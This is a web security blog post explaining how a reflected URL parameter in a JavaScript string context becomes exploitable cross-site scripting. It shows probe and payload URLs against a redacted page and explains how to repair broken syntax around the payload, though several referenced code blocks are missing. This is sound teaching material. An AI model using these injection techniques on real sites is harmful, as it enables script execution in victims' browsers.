Entertaining insights into web security.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

The poor dears.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27

The code now has an extra apostrophe hanging out at the end of pageUrl:

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//

None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with escaping it with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a =' inside the payload.

What needs to be done is re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack, just update the payload with an opening function statement, as below:

The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it at least needs a scope for unnamed, anonymous functions. For example, the following syntax creates and executes an anonymous function that generates an alert:

(function(){alert(9)})()

We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.

Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.